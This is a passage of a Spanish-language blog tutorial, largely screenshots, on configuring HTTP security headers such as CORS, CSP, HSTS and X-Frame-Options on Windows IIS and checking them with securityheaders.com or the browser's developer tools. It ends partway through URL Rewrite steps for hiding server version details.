<div class="MsoNormal">
<b style="font-weight: normal;"><br /></b></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">El servidor en pagina2.honeysec.info devuelve la siguiente respuesta:</span></div>
<div class="MsoNormal">
<b style="font-weight: normal;"><br /></b></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 1pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">HTTP/1.1 200 OK</span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">...</span></div>
<div dir="ltr" style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; padding: 0pt 4pt 1pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Access-Control-Allow-Origin: https://pagina1.honeysec.info</span></div>
<div class="MsoNormal">
<b style="font-weight: normal;"><br /></b></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">El navegador permitirá que el código que se ejecuta en pagina1.honeysec.info acceda a la respuesta porque los</span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">orígenes coinciden.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Estableciendo esta cabecera, se permite únicamente el acceso a los orígenes conocidos, establecidos en una </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">lista, o se deniega completamente.</span></div>
<h3 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 2pt;">
<span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ServerSignature </span><span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: italic; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Off</span><span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> & ServerTokens </span><span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: italic; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Prod</span><span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></h3>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Estas cabeceras sirven para evitar mostrar el sistema operativo que está funcionando en el servidor, la versión y </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">los módulos que se encuentran instalados en apache. </span></div>
<h1 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 12pt;">
<span style="background-color: transparent; color: #2e75b5; font-family: "calibri" , sans-serif; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">¿Cómo se pueden detectar las cabeceras?</span></h1>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Para comprobar las cabeceras de seguridad configuradas podemos acceder a múltiples aplicaciones online </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">como por ejemplo: </span><a href="https://securityheaders.com/" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://securityheaders.com/</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> o mediante la consola de desarrolladores del navegador </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Chrome. Si pulsamos F12 > nos dirigimos a Network > ALL > Pulsamos en la página web deseada > Headers, </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">veremos todas las cabeceras que ofrece la página web:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 327px; overflow: hidden; width: 567px;"><img height="327" src="https://lh6.googleusercontent.com/3kkyEySG88FqaW9ADkuMu9rY3r1QIiFckeqfCJZB8vCJwc-_1yNHcjfIda8TG-PorbE7VT1j1khJRqH7BEHsIBdcln52DNcvPYetGpELzupGtUEAQRnNmRoE0CvL5hDol70Y_Xg" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 359px; overflow: hidden; width: 567px;"><img height="359" src="https://lh5.googleusercontent.com/yu24vBkwWi-i8HKo6OUHRmqWrZO29Fa5H461W5x7g7b-bvRStgB5CCLe378Wrui27W7kZ4HsJ_mFJp6Pbb2ZRIDkQ6XH0CaE_BxYahFMf_eEy8_AWxHnTLdCT5Gk_Q07KzOwnyk" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<div class="MsoNormal">
<b style="font-weight: normal;"><br /></b></div>
<h1 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 12pt;">
<span style="background-color: transparent; color: #2e75b5; font-family: "calibri" , sans-serif; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">¿Cómo configurar las cabeceras en Windows IIS?</span></h1>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Para configurar las cabeceras en IIS, nos dirigiremos al panel de control de Internet Information Server > </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">pincharemos en el nombre de la máquina > HTTP Response Headers.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 299px; overflow: hidden; width: 567px;"><img height="299" src="https://lh6.googleusercontent.com/N_natL2ffqBoUqOmjjPBWdUHb_f08znrd5myyTrkH-H1vOD3psSUZPudjH8QMyH241lWlWq0QqlA5yIC6SDOGHln1RgddrqyjH_9rCEPTLmfoVu7Kmtxk3pnnTO5pf4JB4onL2Q" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Accederemos a una ventana en blanco en donde sólo tendremos que pinchar con el botón secundario para que</span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> nos aparezca una nueva ventana en la que incluir la cabecera.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Antes de configurar las cabeceras, nos dirigimos a </span><a href="https://securityheaders.com/" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://securityheaders.com/</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> y comprobamos qué cabeceras </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">tenemos instaladas y cuál es la nota que nos da la aplicación web:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 434px; overflow: hidden; width: 567px;"><img height="434" src="https://lh4.googleusercontent.com/rn9BorQVmeYbVMguPa09SdjBVz1GSEkj0k2WPXo5gynpmCRqqCo5ruHil1geTysdfTQboPtuG_r9pgqfOcEyoFuziuGmYV8yuT1VH7AAKvT3hoAbpFulcVzzRgZu_0vCM6FcafA" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<h3 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 2pt;">
<span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">X-XSS-Protection: </span></h3>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Para incluir esta cabecera únicamente escribiremos dentro de la ventana los valores que aparecen en la </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">siguiente imagen.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 301px; overflow: hidden; width: 567px;"><img height="301" src="https://lh4.googleusercontent.com/6q4heD9in9GZvhM-x0G5NK1gLGvA_cCTs0Klf-fFb3TpMt5XQuDmxH5EW_IWY-TpY3e0UNuGPXjH6Wuw4qgYkO_lPasuJw2JFyAl70__lUecdDuefDkRaQpjgvQgTs9iJM2CF5o" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span><br />
<span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span>
<span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">X-Frame-Options:</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 302px; overflow: hidden; width: 567px;"><img height="302" src="https://lh6.googleusercontent.com/25GGLKoBfUnNx5_-jiuyU_-BvFTbwF0L4LkQncyZRmpJFUoza4bVKAfk3pPc91ai6jt-qMIOLJ2MFPHuClHXdLtzhWUOJVL5qX8H1Bd5cbpM-1lby4TF9GaktgOhaj3HAXKccng" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<h3 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 2pt;">
<span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">X-Content-Type-Options: </span></h3>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 300px; overflow: hidden; width: 567px;"><img height="300" src="https://lh5.googleusercontent.com/UwtKcpcbEiHm3FcvMBwVFkQeB5TyxL_-QNLRJh8iEFmv1ejVLoNMpaQFPjVvJDpGGA_-iuILal6PQ-t97kokcy7fxGtUkH1AvI2eXstj4ck2ANJAAdyPbEBG74OjoT-C1rpdwcU" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<h3 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 2pt;">
<span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Strict-Transport-Security: </span></h3>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 301px; overflow: hidden; width: 567px;"><img height="301" src="https://lh5.googleusercontent.com/K_tObefZLbzC-ESLvODwCWFSgT24gpi5l7UChuLVvMgYYcGnEoksFe7BNui8bngmjRdkEsWOD4tr7LTtYBFI1xZDKcbDavr3Yf-kTTK3DJT4FQWYiwFHfan7OoI3qebwP91GBVE" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<h3 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 2pt;">
<span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Content-Security-Policy: </span></h3>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 302px; overflow: hidden; width: 567px;"><img height="302" src="https://lh4.googleusercontent.com/XM_Tgh_p2_F7pkjof6Dahx-Su7n6skstFEKSg78ebqwEZnsfmCfsCHrqWKYMCuI2XzCR8U6oiWhAd47ips0CXG5JYpQFfA_9GGJQGDvd1EUAiTCPuCmBPWekvL6WD-QxpZ1cCT8" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<h3 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 2pt;">
<span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Referrer-Policy: </span></h3>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 300px; overflow: hidden; width: 567px;"><img height="300" src="https://lh4.googleusercontent.com/5dLtgB7tax8YaIjYwjS0voTiEElYsDAlBzo8wY8oGxjS9siCelt4hgU2bZXT0BBop9JH4ZPjNTgKzYgdMZmHPimb8DCGEif7K4_y4gjWBx-5X1Frpx9FHCHUefuY1WByUg8FPR0" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<h3 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 2pt;">
<span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Feature-Policy: </span></h3>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 300px; overflow: hidden; width: 567px;"><img height="300" src="https://lh3.googleusercontent.com/DynSpGcPs7b7uC4MH1gR5MHVb-CSA5WcScmoi76s_CsLU2hHWj31uFWGXGamm3vkYyQmaNcbVMhA0pWsnJRJCaD-Nil5wqXJX16zXxq3vv2P4nklQhnHM1y91Kr3IY3lUgLfz0A" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<h3 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 2pt;">
<span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Access-Control-Allow-Origin: </span></h3>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 300px; overflow: hidden; width: 567px;"><img height="300" src="https://lh4.googleusercontent.com/kC-rWsI9G6PGXPn19D3zIP6Gg4lfOT7zA_waLACqq6Hm6UyEpWZZKXDnRVX8XY-2tstrwwBZDbSRpdljk5Pwj6JdBMTpSKKVeiwXCvY2AZHgdMEz0rh3rQUfCj4e9Lya107tzMw" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<h3 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 2pt;">
<span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ServerSignature </span><span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Off</span><span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> & ServerTokens </span><span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Prod</span><span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></h3>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Para conseguir evitar que nuestro IIS envíe información adicional sobre la versión de IIS o de Sistema operativo, </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">no bastará con añadir las cabeceras ServerSignature y ServerTokens, deberemos realizar algunos ajustes en </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">nuestro IIS:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Primero deberemos instalarnos el módulo url-rewrite que encontraremos en la siguiente dirección: </span><br />
<a href="https://www.iis.net/downloads/microsoft/url-rewrite" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.iis.net/downloads/microsoft/url-rewrite</span></a></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 302px; overflow: hidden; width: 567px;"><img height="302" src="https://lh6.googleusercontent.com/bYgAiS3f-lWee6TZTZk8SB_a_bWpCJ1pSsQgAEr7EIT5sTi-fK9ynRgh6gp03yfmlntkBeRzoNd_tbOZ8LVMOf_EfjM4JWeSL5Ln-ByNwFJISfcs2Zb2aAColFtn3SfayAYzUnA" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Accedemos al módulo URL Rewrite y pinchamos en View Server Variables</span></div>
<div class="MsoNormal">
<b style="font-weight: normal;"><br /></b></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 301px; overflow: hidden; width: 567px;"><img height="301" src="https://lh6.googleusercontent.com/-4Ink4hzkRm8QUqGM-dLKJLN4OtzUBDsbe0e2ayzAQuUSgnyb15PO1lMf23Fn-tP3EavnubqE4vD5fvN3t9eBI8qMV-MzGl4ud-xERwk6o3JrXiD7oA57SP_7lKDaO12OWFivTI" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Pinchamos con el botón secundario en el cuadro blanco y a continuación en Add</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 301px; overflow: hidden; width: 567px;"><img height="301" src="https://lh6.googleusercontent.com/-4Ink4hzkRm8QUqGM-dLKJLN4OtzUBDsbe0e2ayzAQuUSgnyb15PO1lMf23Fn-tP3EavnubqE4vD5fvN3t9eBI8qMV-MzGl4ud-xERwk6o3JrXiD7oA57SP_7lKDaO12OWFivTI" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<div class="MsoNormal">
<b style="font-weight: normal;"><br /></b></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 302px; overflow: hidden; width: 567px;"><img height="302" src="https://lh5.googleusercontent.com/zDJyEl83vz-iksORRliFReDj1lKcnIuAc4tgqiWDyby0CNR7Q0Pgy70s0BwjqVcnmHxAYxGZeruEvmZa5lLGFNFP3xp8hHPpzE9kYSx9nID4GFesWn4wmBvp6e26L6B2r9sOsc8" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Volvemos a la ventana de las reglas pinchando en Back to Rules y pinchamos en Add Rule(s) en la ventana que </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">nos aparece deberemos dirigirnos a Blank rule.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 300px; overflow: hidden; width: 567px;"><img height="300" src="https://lh6.googleusercontent.com/6nmkhDsD6C8otWEgUxR3iCU6r_VIiL4FlSA0JLRT-gJ6rnmlq9lh2vuFUYTzVnSr36CGz_9_AKNg5c0XWUSEF3gzvyqYZ4B8oZdTUelc01uoy34_U_IQ0HA_y5YXZkdBkhZthJg" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Dentro de la regla, la editaremos de esta manera:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
